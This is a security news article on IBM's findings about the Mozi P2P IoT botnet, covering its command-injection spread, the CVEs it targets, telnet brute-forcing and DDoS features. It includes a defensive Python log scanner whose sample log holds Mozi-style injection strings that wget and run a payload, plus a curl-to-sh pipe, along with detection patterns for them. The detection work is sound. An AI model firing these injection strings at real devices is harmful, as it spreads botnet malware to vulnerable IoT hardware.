Mozi Botnet Accounted for Majority of IoT Traffic: IBM

Mozi, a relatively new botnet, has fueled a significant increase in Internet of Things (IoT) botnet activity, IBM reported this week.

Mozi shares code with Mirai and its variants and reuses Gafgyt code. It has been highly active over the past year and accounted for 90% of the IoT network traffic IBM observed between October 2019 and June 2020, even though it does not try to remove competing malware from the systems it compromises, IBM researchers say.

The large increase in IoT attacks, however, might also be the result of a higher number of IoT devices being available worldwide, thus expanding the attack surface. At the moment, IBM notes, there are around 31 billion IoT devices worldwide, with approximately 127 devices being deployed each second.

IBM attributes Mozi’s success to command injection (CMDi) attacks against IoT devices, which it says rely on device misconfigurations. The wider deployment of IoT devices, poor configuration practices, and the increase in remote work due to COVID-19 are believed to be responsible for the spike.

Almost all of the observed attacks on IoT devices used CMDi for initial access. Mozi injects a “wget” shell command to download its payload onto the device and then changes the file’s permissions so that it can be executed, giving the attackers a foothold from which to interact with the compromised system.

On vulnerable devices, a file called “mozi.a” was downloaded and then executed on MIPS hardware. The attack targets devices running a reduced instruction set computer (RISC) architecture (MIPS is a RISC instruction set architecture) and can give an adversary the ability to modify the firmware and plant additional malware.
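The download-chmod-execute chain described above is something a defender can look for in device or reverse-proxy access logs. The following Python scanner is an added example, not code from IBM or from the article: it decodes each request's query parameters and flags values that carry a shell separator followed by a downloader, a permission change, or execution of the fetched file, grading a download-plus-chmod chain (or the “mozi.a”-style file name) as the full Mozi pattern and anything less as generic CMDi. The log lines, the IP addresses (RFC 5737 documentation ranges) and the setup.cgi parameter names are constructed for the example, not captured traffic.

```python
"""Flag Mozi-style command-injection (CMDi) attempts in HTTP access logs.

Added example, not from IBM or the article. It looks for the chain the
article describes: a shell separator smuggled into a request parameter,
followed by a download (wget), a permission change (chmod) and execution
of the fetched file. The sample log below is constructed, not real traffic.
"""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_plus, urlsplit

# Combined Log Format (Apache/nginx default); only the fields we need are captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# Shell constructs that split an injected command off the expected value. A single
# '&' is the query-string separator, so only '&&' is treated as a shell operator.
SEPARATOR = re.compile(r";|\|\||\||&&|`|\$\(")
# The stages of the download chain the article describes.
DOWNLOADER = re.compile(r"\b(?:wget|curl|tftp)\b")
PERM_CHANGE = re.compile(r"\bchmod\s+(?:[0-7]{3,4}|[ugoa]*\+[rwx]+)\b")
EXECUTE = re.compile(r"(?:^|[;|&\s])(?:\./\S+|(?:/bin/)?sh(?:\s|$))")
MOZI_NAME = re.compile(r"\bmozi\.[a-z0-9]+\b", re.I)


def decode_params(query: str) -> List[Tuple[str, str]]:
    """Split the raw query on '&' and percent/plus-decode each name and value.

    Done by hand rather than with parse_qsl so that ';' inside a value is kept
    (older Python versions also split on ';', which would hide the injection).
    """
    out = []
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            out.append((unquote_plus(name), unquote_plus(value)))
    return out


def parse_line(line: str) -> Optional[Dict]:
    """Return the log fields plus decoded query values, or None if not in CLF."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = decode_params(parts.query)
    return rec


def classify(rec: Dict) -> Optional[Dict]:
    """Score one parsed request. Returns None when nothing injection-like is present."""
    for name, value in rec["params"]:
        if not SEPARATOR.search(value):
            continue  # a plain value, even one containing 'wget', is not an injection
        stages = {
            "download": bool(DOWNLOADER.search(value)),
            "chmod": bool(PERM_CHANGE.search(value)),
            "exec": bool(EXECUTE.search(value)),
            "mozi-filename": bool(MOZI_NAME.search(value)),
        }
        if not any(stages.values()):
            continue
        # Download + chmod (or the known payload name) is the full Mozi chain;
        # a separator plus any single stage is reported as generic CMDi.
        full_chain = (stages["download"] and stages["chmod"]) or stages["mozi-filename"]
        return {
            "ip": rec["ip"],
            "path": rec["path"],
            "param": name,
            "verdict": "mozi-cmdi" if full_chain else "cmdi",
            "stages": [k for k, v in stages.items() if v],
        }
    return None


def scan(log_text: str) -> List[Dict]:
    """Run classify() over every parseable line and return the hits in order."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            hit = classify(rec)
            if hit:
                hits.append(hit)
    return hits


# Constructed sample: a benign ping form, a Mozi-style chain against a setup.cgi
# endpoint, a POST whose body (where SOAP-style injections live) is not logged,
# a normal page request, and a generic pipe-based injection with a different downloader.
SAMPLE_LOG = """\
203.0.113.10 - - [21/Sep/2020:10:01:02 +0000] "GET /setup.cgi?todo=ping&host=192.0.2.1 HTTP/1.1" 200 512
198.51.100.7 - - [21/Sep/2020:10:01:09 +0000] "GET /setup.cgi?todo=syscmd&cmd=cd+/tmp;wget+http://198.51.100.7:8080/mozi.a;chmod+777+mozi.a;./mozi.a&curpath=/ HTTP/1.1" 404 0
198.51.100.7 - - [21/Sep/2020:10:01:11 +0000] "POST /UPnP/control HTTP/1.1" 500 0
203.0.113.10 - - [21/Sep/2020:10:02:30 +0000] "GET /index.html?lang=en&theme=dark HTTP/1.1" 200 4096
192.0.2.44 - - [21/Sep/2020:10:03:00 +0000] "GET /cgi-bin/diag?host=localhost%7Ccurl+http://192.0.2.44/x.sh%7Csh HTTP/1.1" 200 17
"""

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("sources:", Counter(h["ip"] for h in hits))
```

Two caveats for anyone running this against real logs. First, several of the exploits the article lists (the UPnP SOAP and CCTV-DVR ones) carry the injected command in a POST body, which a standard access log never records; the third sample line is classified as clean for exactly that reason, so a WAF log, a reverse proxy configured to log bodies, or full packet capture is needed to see them. Second, the decision is based on the decoded parameter value, not the raw request line, because the separators and the wget command are almost always percent-encoded.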

Mozi targets many vulnerabilities for infection purposes: CVE-2017-17215 (Huawei HG532), CVE-2018-10561 / CVE-2018-10562 (GPON Routers), CVE-2014-8361 (Realtek SDK), CVE-2008-4873 (Sepal SPBOARD), CVE-2016-6277 (Netgear R7000 / R6400), CVE-2015-2051 (D-Link Devices), Eir D1000 wireless router command injection, Netgear setup.cgi unauthenticated RCE, MVPower DVR command execution, D-Link UPnP SOAP command execution, and RCE impacting multiple CCTV-DVR vendors.

The threat, whose infrastructure is located primarily in China (84%), can also brute-force telnet credentials using a hardcoded list of usernames and passwords.

“The Mozi botnet is a peer-to-peer (P2P) botnet based on the distributed sloppy hash table (DSHT) protocol, which can spread via IoT device exploits and weak telnet passwords,” IBM says.

The malware uses ECDSA384 (elliptic curve digital signature algorithm over a 384-bit curve) to verify its own integrity, and it joins the P2P network through a hardcoded set of public DHT bootstrap nodes.

The botnet can launch distributed denial of service (DDoS) attacks (HTTP, TCP, UDP), execute commands on infected devices, fetch and execute additional payloads, and collect information about the bot.

“As newer botnet groups, such as Mozi, ramp up operations and overall IoT activity surges, organizations using IoT devices need to be cognizant of the evolving threat. IBM is increasingly seeing enterprise IoT devices under fire from attackers. Command injection remains the primary infection vector of choice for threat actors, reiterating how important it is to change default device settings and use effective penetration testing to find and fix gaps in the armor,” IBM concludes.

Related: FritzFrog Botnet Uses Proprietary P2P Protocol

Related: New ‘Kaiji’ Botnet Attacks Linux, IoT Devices via SSH Brute Force

Related: High-Wattage IoT Botnets Can Manipulate Energy Market: Researchers

Written By

Ionut Arghire is an international correspondent for SecurityWeek.